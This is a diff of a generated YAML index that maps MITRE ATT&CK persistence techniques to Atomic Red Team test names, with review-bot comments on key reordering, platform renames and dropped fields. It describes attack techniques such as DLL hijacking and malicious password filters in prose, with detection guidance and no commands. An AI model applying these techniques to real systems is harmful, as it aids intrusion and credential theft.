- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -59784,6 +60140,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -59794,9 +60151,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -59804,8 +60165,24 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
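Review bot: Almost all of the T1053.003 churn is key reordering: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted at the top of the object and re-added verbatim at the bottom, with `external_references` entries also having their `url`/`external_id` key order swapped. The actual semantic changes are small: `x_mitre_version` '1.1' to '1.2', new `x_mitre_deprecated: false`, `revoked: false` and `x_mitre_remote_support: false`, spec version 3.2.0, and `spec_version` dropped. Consider emitting keys in a stable order in the generator (for example a fixed key order or sorted keys) so future regenerations produce a diff that shows only the real changes.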
@@ -59924,11 +60301,15 @@ persistence:
'
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
@@ -59936,74 +60317,68 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests:
- name: Office Application Startup - Outlook as a C2
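Review bot: Two content changes for T1137 are buried in the reorder and deserve a closer look. First, the platform 'Office 365' is replaced with 'Office Suite' (and the same rename happens for T1137.006 below), which follows upstream ATT&CK's consolidation of the cloud platforms; anything that filters this mapping on the literal platform string will stop matching these techniques. Second, `x_mitre_permissions_required` (User, Administrator) is removed entirely for T1137 and T1137.006, while T1053.003 in the hunk above keeps its `x_mitre_permissions_required: User`. If the removal reflects the upstream objects that is fine, but please confirm it is not the generator dropping the list on some code path.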
@@ -60027,7 +60402,7 @@ persistence:
name: command_prompt
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -60057,6 +60432,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -60067,6 +60443,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -60075,13 +60452,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
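Review bot: T1098.003's platform list collapses from five entries (Office 365, IaaS, SaaS, Google Workspace, Azure AD) to four (IaaS, SaaS, Office Suite, Identity Provider), with the version bumped to '2.5'. Any platform-keyed view derived from this field that used the 'Google Workspace' or 'Azure AD' names will no longer select this technique, so the derived index files need regenerating in the same change. The atomic test for this technique (context just below, "Azure AD - Add Company Administrator Role to a user") is the project's own name and is unaffected by the rename.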
@@ -60123,9 +60500,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests:
- name: Azure AD - Add Company Administrator Role to a user
@@ -60316,7 +60690,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests:
- name: Print Processors
@@ -60356,14 +60729,14 @@ persistence:
elevation_required: true
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -60379,8 +60752,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -60394,7 +60767,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -60420,6 +60793,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
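Review bot: The new `Hexacorn DLL Hijacking` reference is consistent with the `(Citation: Hexacorn DLL Hijacking)` added to the phantom DLL sentence in the description hunk above, so the citation resolves. Unrelated but visible in the unchanged context: the `Microsoft Security Advisory 2269637` reference has an empty year, "Microsoft. (, May 23)". Since this file is generated from upstream ATT&CK data, that should be reported and fixed upstream rather than hand-edited here.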
@@ -60447,7 +60824,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
@@ -60516,37 +60892,7 @@ persistence:
elevation_required: true
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -60561,13 +60907,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -60575,11 +60926,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests:
- name: Code Executed Via Excel Add-in File (XLL)
@@ -60840,7 +61214,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
@@ -60878,8 +61252,6 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests:
- name: Install MS Exchange Transport Agent Persistence
@@ -60927,7 +61299,7 @@ persistence:
elevation_required: true
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -60953,7 +61325,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
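Review bot: the contributor entry for AppDomainManager changes from `Ivy Bostock` to `Ivy Drexel`. Contributor attribution is copied from upstream ATT&CK STIX data, so please confirm this rename exists upstream rather than being a local edit, so the index does not drift from its source of record.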
@@ -60995,7 +61367,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -61073,11 +61444,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -61157,35 +61527,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -61209,22 +61554,44 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
@@ -61322,51 +61689,18 @@ persistence:
elevation_required: true
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
